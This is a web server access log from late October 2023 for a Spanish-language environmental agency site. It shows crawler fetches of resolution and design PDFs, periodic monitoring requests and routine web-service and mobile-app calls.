172.22.2.4 - - [28/Oct/2023:22:37:10 -0500] "GET /BLA/boletinlegal/Circulares/023%09/CIRCULAR%20No.%2000011%20DEL%2023%20DE%20OCTUBRE%20DEL%202023%09.pdf HTTP/1.1" 403 1026
172.22.2.4 - - [28/Oct/2023:22:37:13 -0500] "GET /BLA/boletinlegal/Circulares/023%09/CIRCULAR%20No.%2000011%20DEL%2023%20DE%20OCTUBRE%20DEL%202023%09.pdf HTTP/1.1" 403 1026
172.22.2.4 - - [28/Oct/2023:22:37:16 -0500] "GET /BLA/boletinlegal/Circulares/023%09/CIRCULAR%20No.%2000011%20DEL%2023%20DE%20OCTUBRE%20DEL%202023%09.pdf HTTP/1.1" 403 1026
172.22.2.4 - - [28/Oct/2023:22:37:20 -0500] "GET /BLA/boletinlegal/Circulares/023%09/CIRCULAR%20No.%2000011%20DEL%2023%20DE%20OCTUBRE%20DEL%202023%09.pdf HTTP/1.1" 403 1026
172.22.2.4 - - [28/Oct/2023:22:37:24 -0500] "GET /BLA/boletinlegal/Circulares/023%09/CIRCULAR%20No.%2000011%20DEL%2023%20DE%20OCTUBRE%20DEL%202023%09.pdf HTTP/1.1" 403 1026
201.245.192.253 - - [28/Oct/2023:22:37:46 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41061
201.245.192.253 - - [28/Oct/2023:22:37:49 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41055
49.7.20.129 - - [28/Oct/2023:22:38:33 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [28/Oct/2023:22:37:27 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [28/Oct/2023:22:39:28 -0500] "HEAD / HTTP/1.1" 200 -
52.167.144.209 - - [28/Oct/2023:22:39:44 -0500] "GET /BLA/resoluciones/AUTOS%202023/3169.pdf HTTP/1.1" 200 788422
172.22.2.4 - - [28/Oct/2023:22:38:18 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58309
201.245.192.253 - - [28/Oct/2023:22:40:45 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40654
201.245.192.253 - - [28/Oct/2023:22:40:54 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41061
201.245.192.253 - - [28/Oct/2023:22:40:57 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41055
216.245.221.92 - - [28/Oct/2023:22:44:28 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [28/Oct/2023:22:43:17 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
40.77.167.44 - - [28/Oct/2023:22:45:13 -0500] "GET /BLA/resoluciones/AUTOS%202023/3301.pdf HTTP/1.1" 200 949416
186.80.52.180 - - [28/Oct/2023:22:45:32 -0500] "-" 408 -
201.245.192.253 - - [28/Oct/2023:22:45:43 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40654
172.22.2.4 - - [28/Oct/2023:22:44:08 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57957
168.119.253.32 - - [28/Oct/2023:22:46:56 -0500] "GET / HTTP/1.1" 200 319
168.119.253.32 - - [28/Oct/2023:22:46:57 -0500] "GET / HTTP/1.1" 200 4720
168.119.253.61 - - [28/Oct/2023:22:48:05 -0500] "GET / HTTP/1.1" 200 319
168.119.253.61 - - [28/Oct/2023:22:48:07 -0500] "GET / HTTP/1.1" 200 4720
216.245.221.92 - - [28/Oct/2023:22:49:28 -0500] "HEAD / HTTP/1.1" 200 -
186.84.20.209 - - [28/Oct/2023:22:49:49 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2020%2F HTTP/1.1" 200 169572
40.77.167.44 - - [28/Oct/2023:22:50:00 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0173.pdf HTTP/1.1" 200 426684
201.245.192.253 - - [28/Oct/2023:22:50:42 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40654
172.22.2.4 - - [28/Oct/2023:22:49:07 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.77.10 - - [28/Oct/2023:22:51:30 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%201801%20AL%201900/RESOLUCION%201848%20DE%202007.pdf HTTP/1.1" 200 182223
172.22.2.4 - - [28/Oct/2023:22:49:58 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58309
40.77.167.63 - - [28/Oct/2023:22:52:40 -0500] "GET /BLA/resoluciones/AUTOS%202023/5135.pdf HTTP/1.1" 200 820924
66.249.77.9 - - [28/Oct/2023:22:52:57 -0500] "GET /Publicaciones/2023EE215073.pdf HTTP/1.1" 404 228
40.77.167.63 - - [28/Oct/2023:22:53:50 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/0365.pdf HTTP/1.1" 200 340936
216.245.221.92 - - [28/Oct/2023:22:54:28 -0500] "HEAD / HTTP/1.1" 200 -
185.224.128.199 - - [28/Oct/2023:22:55:02 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [28/Oct/2023:22:55:41 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40654
172.22.2.4 - - [28/Oct/2023:22:54:57 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [28/Oct/2023:22:55:48 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58309
40.77.167.63 - - [28/Oct/2023:22:57:31 -0500] "GET /BLA/resoluciones/AUTOS%202007/0739.pdf HTTP/1.1" 200 22211
40.77.167.63 - - [28/Oct/2023:22:57:33 -0500] "GET /BLA/resoluciones/AUTOS%202023/5234.pdf HTTP/1.1" 200 984382
40.77.167.50 - - [28/Oct/2023:22:57:58 -0500] "GET /BLA/resoluciones/AUTOS%202023/3372.pdf HTTP/1.1" 200 2106322
216.245.221.92 - - [28/Oct/2023:22:59:28 -0500] "HEAD / HTTP/1.1" 200 -
40.77.167.19 - - [28/Oct/2023:23:00:07 -0500] "GET /BLA/resoluciones/AUTOS%202023/5119.pdf HTTP/1.1" 200 423484
201.245.192.253 - - [28/Oct/2023:23:00:40 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40654
40.77.167.61 - - [28/Oct/2023:23:01:48 -0500] "GET /BLA/resoluciones/AUTOS%202023/4062.pdf HTTP/1.1" 200 652050
172.22.2.4 - - [28/Oct/2023:23:00:47 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [28/Oct/2023:23:01:38 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57957
40.77.167.61 - - [28/Oct/2023:23:03:37 -0500] "GET /BLA/resoluciones/AUTOS%202021/4532.pdf HTTP/1.1" 304 -
40.77.167.1 - - [28/Oct/2023:23:04:08 -0500] "GET /BLA/resoluciones/AUTOS%202023/2444.pdf HTTP/1.1" 200 329257
216.245.221.92 - - [28/Oct/2023:23:04:28 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [28/Oct/2023:23:05:39 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40654
66.249.66.38 - - [28/Oct/2023:23:06:35 -0500] "GET /el-agua-recurso-vital-para-la-conservacion-de-los-ecosistemas.html HTTP/1.1" 304 -
114.119.148.169 - - [28/Oct/2023:23:07:04 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES%2B2000/&sort=size&order=asc HTTP/1.1" 200 13903
172.22.2.4 - - [28/Oct/2023:23:06:37 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
114.119.150.190 - - [28/Oct/2023:23:08:25 -0500] "GET /BLA/resoluciones/index.php?dir=2018/&sort=size&order=desc HTTP/1.1" 200 1607
172.22.2.4 - - [28/Oct/2023:23:06:59 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 45652
172.22.2.4 - - [28/Oct/2023:23:07:28 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 47021
216.245.221.92 - - [28/Oct/2023:23:09:28 -0500] "HEAD / HTTP/1.1" 200 -
66.249.77.10 - - [28/Oct/2023:23:10:25 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/1260.pdf HTTP/1.1" 200 684752
201.245.192.253 - - [28/Oct/2023:23:10:38 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40654
186.102.36.165 - - [28/Oct/2023:23:10:46 -0500] "GET /agendate-para-participar-en-las-caminatas-ecologicas-de-febrero.html HTTP/1.1" 200 830
198.235.24.35 - - [28/Oct/2023:23:13:26 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [28/Oct/2023:23:12:27 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
40.77.167.53 - - [28/Oct/2023:23:14:15 -0500] "GET /BLA/resoluciones/AUTOS%202023/4041.pdf HTTP/1.1" 200 1879583
40.77.167.4 - - [28/Oct/2023:23:14:21 -0500] "GET /Publicaciones/2023EE210225.pdf HTTP/1.1" 404 228
216.245.221.92 - - [28/Oct/2023:23:14:28 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [28/Oct/2023:23:13:18 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55500
201.245.192.253 - - [28/Oct/2023:23:15:37 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40654
52.167.144.192 - - [28/Oct/2023:23:17:20 -0500] "GET /BLA/resoluciones/AUTOS%202023/4170.pdf HTTP/1.1" 200 416480
201.245.192.253 - - [28/Oct/2023:23:17:47 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41048
201.245.192.253 - - [28/Oct/2023:23:17:49 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41049
216.245.221.92 - - [28/Oct/2023:23:19:28 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [28/Oct/2023:23:18:18 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
40.77.167.2 - - [28/Oct/2023:23:20:02 -0500] "GET /BLA/resoluciones/AUTOS%202023/3371.pdf HTTP/1.1" 200 2020218
201.245.192.253 - - [28/Oct/2023:23:20:35 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40654
172.22.2.4 - - [28/Oct/2023:23:19:09 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60682
201.245.192.253 - - [28/Oct/2023:23:20:54 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41048
172.22.2.4 - - [28/Oct/2023:23:20:57 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
201.245.192.253 - - [28/Oct/2023:23:20:57 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41049
52.167.144.204 - - [28/Oct/2023:23:21:55 -0500] "GET /BLA/resoluciones/AUTOS%202022/7545.pdf HTTP/1.1" 200 415528
172.22.2.4 - - [28/Oct/2023:23:20:57 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 62469
40.77.167.4 - - [28/Oct/2023:23:23:03 -0500] "GET /BLA/resoluciones/AUTOS%202021/1892.pdf HTTP/1.1" 304 -
52.167.144.204 - - [28/Oct/2023:23:24:03 -0500] "GET /BLA/resoluciones/AUTOS%202023/4175.pdf HTTP/1.1" 200 406339
66.249.77.9 - - [28/Oct/2023:23:24:23 -0500] "GET /siipev/Diseno%20de%20Elementos%20de%20Mobiliario%20Urbano/Diseno%20pertenecientes%20al%20mobiliario%20urbano%20M10-M160/PARTE%20A/Dise%C3%B1o%20de%20Elementos%20M-70.pdf HTTP/1.1" 200 931957
66.249.77.9 - - [28/Oct/2023:23:24:24 -0500] "GET /siipev/Diseno%20de%20Elementos%20de%20Mobiliario%20Urbano/Otros%20Elementos/PARTE%20B/Dise%C3%B1o%20de%20Elementos%20M-140.pdf HTTP/1.1" 200 297012
66.249.77.8 - - [28/Oct/2023:23:24:25 -0500] "GET /siipev/Diseno%20de%20Elementos%20de%20Mobiliario%20Urbano/Diseno%20pertenecientes%20al%20mobiliario%20urbano%20M10-M160/PARTE%20A/Dise%C3%B1o%20de%20Elementos%20M-121.pdf HTTP/1.1" 200 947242
66.249.77.9 - - [28/Oct/2023:23:24:25 -0500] "GET /siipev/Diseno%20de%20Elementos%20de%20Mobiliario%20Urbano/Diseno%20pertenecientes%20al%20mobiliario%20urbano%20M10-M160/PARTE%20A/Dise%C3%B1o%20de%20Elementos%20M-30.pdf HTTP/1.1" 200 1094887
66.249.77.9 - - [28/Oct/2023:23:24:26 -0500] "GET /siipev/Diseno%20de%20Elementos%20de%20Mobiliario%20Urbano/Otros%20Elementos/PARTE%20B/Dise%C3%B1o%20de%20Elementos%20M120-M121.pdf HTTP/1.1" 200 503191
66.249.77.9 - - [28/Oct/2023:23:24:27 -0500] "GET /siipev/Diseno%20de%20Elementos%20de%20Mobiliario%20Urbano/Otros%20Elementos/PARTE%20C/Dise%C3%B1o%20de%20Elementos%20MEA30.pdf HTTP/1.1" 200 715942
66.249.77.9 - - [28/Oct/2023:23:24:28 -0500] "GET /siipev/Diseno%20de%20Elementos%20de%20Mobiliario%20Urbano/Diseno%20pertenecientes%20al%20mobiliario%20urbano%20M10-M160/PARTE%20A/Dise%C3%B1o%20de%20Elementos%20M-71.pdf HTTP/1.1" 200 1269708
216.245.221.92 - - [28/Oct/2023:23:24:28 -0500] "HEAD / HTTP/1.1" 200 -
66.249.77.8 - - [28/Oct/2023:23:24:29 -0500] "GET /siipev/Diseno%20de%20Elementos%20de%20Mobiliario%20Urbano/Otros%20Elementos/PARTE%20B/Dise%C3%B1o%20de%20Elementos%20M-81.pdf HTTP/1.1" 200 325145
66.249.77.10 - - [28/Oct/2023:23:24:30 -0500] "GET /siipev/Diseno%20de%20Elementos%20de%20Mobiliario%20Urbano/Diseno%20pertenecientes%20al%20mobiliario%20urbano%20M10-M160/PARTE%20A/Dise%C3%B1o%20de%20Elementos%20M-141.pdf HTTP/1.1" 200 1384354
66.249.77.8 - - [28/Oct/2023:23:24:31 -0500] "GET /siipev/Diseno%20de%20Elementos%20de%20Mobiliario%20Urbano/Otros%20Elementos/PARTE%20B/Dise%C3%B1o%20de%20Elementos%20M110.pdf HTTP/1.1" 200 236643
66.249.77.10 - - [28/Oct/2023:23:24:31 -0500] "GET /siipev/Diseno%20de%20Elementos%20de%20Mobiliario%20Urbano/Otros%20Elementos/PARTE%20B/Dise%C3%B1o%20de%20Elementos%20M-130.pdf HTTP/1.1" 200 815593
66.249.77.8 - - [28/Oct/2023:23:24:32 -0500] "GET /siipev/Diseno%20de%20Elementos%20de%20Mobiliario%20Urbano/Diseno%20pertenecientes%20al%20mobiliario%20urbano%20M10-M160/PARTE%20A/Dise%C3%B1o%20de%20Elementos%20M-143.pdf HTTP/1.1" 200 2220835
66.249.77.13 - - [28/Oct/2023:23:24:34 -0500] "GET /siipev/Diseno%20de%20Elementos%20de%20Mobiliario%20Urbano/Otros%20Elementos/PARTE%20B/Dise%C3%B1o%20de%20Elementos%20M20.pdf HTTP/1.1" 200 584130
66.249.77.8 - - [28/Oct/2023:23:24:35 -0500] "GET /siipev/Diseno%20de%20Elementos%20de%20Mobiliario%20Urbano/Otros%20Elementos/PARTE%20B/Dise%C3%B1o%20de%20Elementos%20M-91.pdf HTTP/1.1" 200 244235
66.249.77.12 - - [28/Oct/2023:23:24:35 -0500] "GET /siipev/Diseno%20de%20Elementos%20de%20Mobiliario%20Urbano/Otros%20Elementos/PARTE%20B/Dise%C3%B1o%20de%20Elementos%20M-82.pdf HTTP/1.1" 200 288038
66.249.77.13 - - [28/Oct/2023:23:24:36 -0500] "GET /siipev/Diseno%20de%20Elementos%20de%20Mobiliario%20Urbano/Diseno%20pertenecientes%20al%20mobiliario%20urbano%20M10-M160/PARTE%20A/Dise%C3%B1o%20de%20Elementos%20M-120.pdf HTTP/1.1" 200 846128
66.249.77.8 - - [28/Oct/2023:23:24:37 -0500] "GET /siipev/Diseno%20de%20Elementos%20de%20Mobiliario%20Urbano/Diseno%20pertenecientes%20al%20mobiliario%20urbano%20M10-M160/PARTE%20A/Dise%C3%B1o%20de%20Elementos%20M-146.pdf HTTP/1.1" 200 1872252
66.249.77.9 - - [28/Oct/2023:23:24:38 -0500] "GET /siipev/Diseno%20de%20Elementos%20de%20Mobiliario%20Urbano/Diseno%20pertenecientes%20al%20mobiliario%20urbano%20M10-M160/PARTE%20A/Dise%C3%B1o%20de%20Elementos%20M-62.pdf HTTP/1.1" 200 520421
66.249.77.9 - - [28/Oct/2023:23:24:39 -0500] "GET /siipev/Diseno%20de%20Elementos%20de%20Mobiliario%20Urbano/Diseno%20pertenecientes%20al%20mobiliario%20urbano%20M10-M160/PARTE%20A/Dise%C3%B1o%20de%20Elementos%20M-148.pdf HTTP/1.1" 200 751836
66.249.77.10 - - [28/Oct/2023:23:24:39 -0500] "GET /siipev/Diseno%20de%20Elementos%20de%20Mobiliario%20Urbano/Diseno%20pertenecientes%20al%20mobiliario%20urbano%20M10-M160/PARTE%20A/Dise%C3%B1o%20de%20Elementos%20M-131.pdf HTTP/1.1" 200 1348523
201.245.192.253 - - [28/Oct/2023:23:25:34 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40654
172.22.2.4 - - [28/Oct/2023:23:24:08 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [28/Oct/2023:23:24:59 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57957
172.22.2.4 - - [28/Oct/2023:23:26:46 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%209%20del%2021%20de%20Agosto%20de%202012.pdf HTTP/1.1" 200 1402289
66.249.77.12 - - [28/Oct/2023:23:26:51 -0500] "GET /BLA/resoluciones/Notificaciones/REGISTROS%202016/1856.pdf HTTP/1.1" 200 476499
201.245.192.253 - - [28/Oct/2023:23:27:47 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41048
201.245.192.253 - - [28/Oct/2023:23:27:49 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41049
66.249.77.12 - - [28/Oct/2023:23:28:46 -0500] "GET /Residuos/textiles/files/guia_textiles.pdf HTTP/1.1" 200 12356716
216.245.221.92 - - [28/Oct/2023:23:29:28 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [28/Oct/2023:23:30:33 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40654
66.249.77.10 - - [28/Oct/2023:23:29:12 -0500] "GET /BLA/boletinlegal/index.php? HTTP/1.1" 200 57957
66.249.77.11 - - [28/Oct/2023:23:30:54 -0500] "GET /BLA/boletinlegal/style.css HTTP/1.1" 200 9406
201.245.192.253 - - [28/Oct/2023:23:30:54 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41048
201.245.192.253 - - [28/Oct/2023:23:30:57 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41049
172.22.2.4 - - [28/Oct/2023:23:29:58 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
40.77.167.77 - - [28/Oct/2023:23:32:14 -0500] "GET /BLA/resoluciones/AUTOS%202023/4967.pdf HTTP/1.1" 200 592569
172.22.2.4 - - [28/Oct/2023:23:30:49 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53050
66.249.66.37 - - [28/Oct/2023:23:32:36 -0500] "GET /robots.txt HTTP/1.1" 404 1034
66.249.66.38 - - [28/Oct/2023:23:32:36 -0500] "GET /distrito-planto-mas-de-300-arboles-en-corredor-vial-de-la-aurora-en-usme-para-celebrar-el-dia-mundial-del-arbol.html HTTP/1.1" 304 -
216.245.221.92 - - [28/Oct/2023:23:34:28 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [28/Oct/2023:23:33:23 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 62892
40.77.167.61 - - [28/Oct/2023:23:35:16 -0500] "GET /BLA/resoluciones/AUTOS%202022/2549.pdf HTTP/1.1" 304 -
66.249.66.167 - - [28/Oct/2023:23:35:30 -0500] "GET /portaldeninos/humedal-el-burro-2/ HTTP/1.1" 200 87926
66.249.66.165 - - [28/Oct/2023:23:35:33 -0500] "GET /portaldeninos/wp-content/themes/betheme/js/plugins.js?ver=20.9.6 HTTP/1.1" 200 197151
201.245.192.253 - - [28/Oct/2023:23:35:32 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40654
69.171.249.8 - - [28/Oct/2023:23:35:40 -0500] "GET /images/cuerpos%20de%20agua%20en%20humedales-19-10.jpg HTTP/1.1" 200 73528
66.249.66.167 - - [28/Oct/2023:23:36:20 -0500] "GET /portaldeninos/humedal-tibanica-2/ HTTP/1.1" 200 87771
66.249.66.165 - - [28/Oct/2023:23:36:23 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/CSS/totalsoft.css?ver=4.9.8 HTTP/1.1" 200 40622
52.167.144.228 - - [28/Oct/2023:23:36:53 -0500] "GET /bla/resoluciones/notificaciones/registros%202018/0141.pdf HTTP/1.1" 304 -
34.147.109.204 - - [28/Oct/2023:23:36:56 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
172.22.2.4 - - [28/Oct/2023:23:37:19 -0500] "GET /BLA/boletinlegal/Circulares/2019/.pdf HTTP/1.1" 404 1218
172.22.2.4 - - [28/Oct/2023:23:35:48 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [28/Oct/2023:23:37:29 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%2010%20del%2026%20de%20Enero%20de%202012.pdf HTTP/1.1" 404 1218
172.22.2.4 - - [28/Oct/2023:23:37:33 -0500] "GET /BLA/boletinlegal/Circulares/023%09/CIRCULAR%20No.%2000011%20DEL%2023%20DE%20OCTUBRE%20DEL%202023%09.pdf HTTP/1.1" 403 1026
172.22.2.4 - - [28/Oct/2023:23:37:36 -0500] "GET /BLA/boletinlegal/Circulares/023%09/CIRCULAR%20No.%2000011%20DEL%2023%20DE%20OCTUBRE%20DEL%202023%09.pdf HTTP/1.1" 403 1026
172.22.2.4 - - [28/Oct/2023:23:37:40 -0500] "GET /BLA/boletinlegal/Circulares/023%09/CIRCULAR%20No.%2000011%20DEL%2023%20DE%20OCTUBRE%20DEL%202023%09.pdf HTTP/1.1" 403 1026
172.22.2.4 - - [28/Oct/2023:23:37:44 -0500] "GET /BLA/boletinlegal/Circulares/023%09/CIRCULAR%20No.%2000011%20DEL%2023%20DE%20OCTUBRE%20DEL%202023%09.pdf HTTP/1.1" 403 1026
172.22.2.4 - - [28/Oct/2023:23:37:46 -0500] "GET /BLA/boletinlegal/Circulares/023%09/CIRCULAR%20No.%2000011%20DEL%2023%20DE%20OCTUBRE%20DEL%202023%09.pdf HTTP/1.1" 403 1026
201.245.192.253 - - [28/Oct/2023:23:37:47 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41048
201.245.192.253 - - [28/Oct/2023:23:37:49 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41049
172.22.2.4 - - [28/Oct/2023:23:36:39 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60682
52.167.144.212 - - [28/Oct/2023:23:38:33 -0500] "GET /BLA/resoluciones/AUTOS%202021/3400.pdf HTTP/1.1" 304 -
216.245.221.92 - - [28/Oct/2023:23:39:28 -0500] "HEAD / HTTP/1.1" 200 -
172.105.128.11 - - [28/Oct/2023:23:39:45 -0500] "GET / HTTP/1.1" 200 319
40.77.167.61 - - [28/Oct/2023:23:39:55 -0500] "GET /BLA/resoluciones/AUTOS%202023/3225.pdf HTTP/1.1" 200 346080
181.56.235.113 - - [28/Oct/2023:23:40:25 -0500] "GET /Publicaciones/2023EE243820.pdf HTTP/1.1" 200 291673
201.245.192.253 - - [28/Oct/2023:23:40:31 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40654
201.245.192.253 - - [28/Oct/2023:23:40:54 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41048
201.245.192.253 - - [28/Oct/2023:23:40:57 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41049
186.102.36.233 - - [28/Oct/2023:23:42:09 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX19mrU1eg1CNJkdNsei9AdDNtB5FqUzTakFC+YmcXYuthCJVT9LHwCWGXB9vN5kX+TvmFqiCQq23nQbKL/Eo0RQe+zYduvbqt8tVj0FsWNPL9MDgoxc39VjphhJthDIA2wGDcEZUp8xESubx9IA3K3QRcDwRpiOOKZxoz/copUbyFfPRPwS1MgmOJXwaOyf6L39fhuXh9lWpKDGo/uIoR/67dIAGGUWVk6s8hs+/zBZYIP7ZTBxqgfBdRBe6Is4dAgOA77wogBryKo/wpaJI/oXf1Wx96g1uKuA=&u=U2FsdGVkX1+ObvTWtjJg5uWHtemq2dU+yAXjDMkjuwxhcUWOVdz6NhPwWOYfV20/&y=U2FsdGVkX1+dz3mJI5QhVmLT9pNp058QdJzx9agHb5mbNvQrcEcR6Ry1JhCal1As HTTP/1.1" 200 26
186.102.36.233 - - [28/Oct/2023:23:42:10 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX19lxXTtouCXdzZVwkbhunliLmiQ2bf/ZdNv8ymNAUhPIiXzUMjpqfNkDc5EK2OvsaMOmNyBI3KU255phWs+y/R8dP8C9el47iB3ebg36P8Q7mzZXwL+jj2L07FFc4lesD9mJkP9WQcNX9qmtuxKq9IPMSlbLHCv+RnSBjwx+1o2zCXX+gFLv30YcSqbEdEqsmTYSZ8OtXKAIU/0Nq+tDROblG3AGst32lB7wQOGn48v5ZXNvFJvPovhLojAjHQhxiLrEtncdGhZChPusT9Z4kZPIu3pBo/1KbZFQMw10+wy/BM9y7PAto/YXEAmL3XE+n9AmFZqq3UNBqO8fL3Budu3Zf5/4Bp1WNbGGRKEIDMXmmmXdHXB6jdlVbQhsUNv/mNiAKVeiWacKlM2wkwWK1FkFLEIgS9A+ZM/oTUM6j1Y1bmAk6SI0w/3CdvaUkfpUdTPItiaID8nOR9C7+0f8kKyqSjou7volJUrz8C/OVKoSvmBNBYTONaZZKLRqeVwexjDAWOPLZpQphEG0wuJ51EU16RUJjswf4VOkRuQ35rxT3Lbxs+teRNRPBfWsI4GpLkJiZhtN2Vl2iWCW74Ri58+/mQ+hihaz3rVYVuPf5NLmW+xQk0IUTXx2X3mIouujuf5IUMlcXuk6R4OfMJ+Y/TuJC8C2gJ1G1lFNYqxn+oy6A/1KCBEWlvE9xCV3VgNDJSumY0uS9IAYv6cn1zp9qhc5k3F8BdM6sUJvixb/40lvcRhmh+TRau853IN5XmWxuWiPgT7+9hB8GCXGEQb2CAuDpIkBZQcev1kVzOQYvD5r+5krgvZ6pcXWfJCsAX9ZMiTfXqRXVUpSP9WpVW3QGnI9XEv32yUyTMHgOSXjVZQIxyW5SwLsVV9dkIleZr/rzq2RCPzsunquBD4WpqRQ3VNKsBeiRpVILkVnJ37XNSTVMJ1JLPkMlPMkfJ72PvQI/owdHXhpz3Nlvg54HGnueiGUO7eBad0eR7oFHRKlwu1FxUC4Is9858wit838W90eo43hOUgcTA6wl/9ekOwVUB/bsUSfqiLbfrGQpC5+fcuvkfVhP6boOEME9J5ON/0Re/YqX2cNZKycRMB6v8PaUVCeXG4ZsJJR9UIN7lZim6loS9qTlJHXdGmSvjyHdA5OQg4IINP0HkuCPK0h8r9q8LOfcthnZboMBipolg70bX1HPtNvcEB/oL9HCmF64fpTz4keLcYYQHiP9RfHQGxZGEWREYYwMmMaVQ=&u=U2FsdGVkX1+ObvTWtjJg5uWHtemq2dU+yAXjDMkjuwxhcUWOVdz6NhPwWOYfV20/&y=U2FsdGVkX1+dz3mJI5QhVmLT9pNp058QdJzx9agHb5mbNvQrcEcR6Ry1JhCal1As HTTP/1.1" 200 26
186.102.36.233 - - [28/Oct/2023:23:42:11 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX19bMKlrvKHGjjD0pF7aiPPHtcO2GRczcGJCH6+VfZ8yQDeZawJfvG2NYZy60QG0GIvqgEuNaB55vmyLZRfAcVPcen/ALXTWhEdBvGKLbhylWGCAWr+Aa0zu0RVKSayy7Fxdz1MtMcyJnC2aMpWzZzOX7cs91QRhWQM=&u=U2FsdGVkX1+ObvTWtjJg5uWHtemq2dU+yAXjDMkjuwxhcUWOVdz6NhPwWOYfV20/&y=U2FsdGVkX1+dz3mJI5QhVmLT9pNp058QdJzx9agHb5mbNvQrcEcR6Ry1JhCal1As HTTP/1.1" 200 26
186.102.36.233 - - [28/Oct/2023:23:42:11 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1/LazN8R5vAfMMpNIz0XuLfAL7J1JEg8gavRr2iwFvaktES10603681Jnt8AuCFBCQsSmytPqMviOjfb8747jZULcPDdQjVe0zkZkYm+e5pDcqrB8FrCvBPUHp50FVsRyaHLDHxxVQT3YA2vsEJuxbYgNkpRTgIyzY=&u=U2FsdGVkX1+ObvTWtjJg5uWHtemq2dU+yAXjDMkjuwxhcUWOVdz6NhPwWOYfV20/&y=U2FsdGVkX1+dz3mJI5QhVmLT9pNp058QdJzx9agHb5mbNvQrcEcR6Ry1JhCal1As HTTP/1.1" 200 26
